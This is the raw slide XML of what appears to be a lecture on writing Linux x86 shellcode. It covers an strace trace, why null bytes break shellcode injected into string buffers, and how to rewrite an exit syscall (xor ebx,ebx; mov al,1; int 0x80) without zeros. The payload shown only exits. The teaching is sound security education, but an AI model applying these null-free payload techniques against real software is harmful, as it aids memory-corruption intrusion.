            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 3</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196"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97" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{6101A131-D1D1-4161-A151-41A1111121C1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="990720"/>
            <a:ext cx="8000640" cy="4753800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>fstat64(3, {st_mode=S_IFREG|0644, st_size=60420, ...}) = 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>old_mmap(NULL, 60420, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40018000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>close(3)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>access("/etc/ld.so.nohwcap", F_OK)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= -1 ENOENT (No such file or directory)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>open("/lib/libc.so.6", O_RDONLY)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200^\1"..., 512) = 512</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>fstat64(3, {st_mode=S_IFREG|0644, st_size=1243792, ...}) = 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>old_mmap(NULL, 1253956, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40027000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>old_mmap(0x4014f000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x127000) = 0x4014f000</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201"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202" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{11E1F1C1-A161-4131-9101-21D181411171}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2438280"/>
            <a:ext cx="7162560" cy="2833560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>old_mmap(0x40157000, 8772, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>MAP_ANONYMOUS, -1, 0) = 0x40157000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>close(3)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>munmap(0x40018000, 60420)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>_exit(0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>= ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="609480"/>
            <a:ext cx="7745040" cy="5516280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>On the last line, you can notice our _exit(2) system call. Unfortunately, looking at the shellcode, we can notice a little problem: it contains a lot of null bytes and, since the shellcode is often written into a string buffer, those bytes will be treated as string terminators by the application and the attack will fail. There are two ways to get around this problem:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>writing instructions that don't contain null bytes (not always possible),</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>writing a self-modifying shellcode (without null bytes) which will write the necessary null bytes (e.g. string terminators) at run-time.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206"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207" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C151B1B1-41F1-4111-8111-710121E171C1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>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699120" y="609480"/>
            <a:ext cx="7745040" cy="5516280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>We will now apply the first method, while we will implement the second later. First, the first instruction (mov ebx, 0) can be replaced by the more common (for performance reasons):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charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The second instruction, instead, contained all those zeroes because we were using a 32 bit register (EAX), thus making 0x01 become 0x01000000 (bytes are in reverse order because Intel® processors are little endian). Therefore, we can solve this problem simply using an 8 bit register (AL) instead of a 32 bit register:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209"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210" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C1B10161-9141-4171-B1E1-51A1B171C181}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2194560"/>
            <a:ext cx="2061000" cy="811080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>xor ebx, ebx </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326240" y="5852160"/>
            <a:ext cx="2605680" cy="649800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov al, 1 </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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="533520"/>
            <a:ext cx="7745040" cy="5592240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Now our assembly code looks like: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buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>and the shellcode becomes :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214"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215" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{11D1A161-E151-41E1-A1F1-4181B1512121}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066680" y="1237320"/>
            <a:ext cx="2971440" cy="1460880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>xor ebx, ebx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov al, 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>int 0x80 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441040" y="3520800"/>
            <a:ext cx="3428640" cy="2971440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ nasm -f exit2.asm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ objdump -d exit2.o</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>exit2.o:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>file format elf32-i386</a:t>
            </a:r>
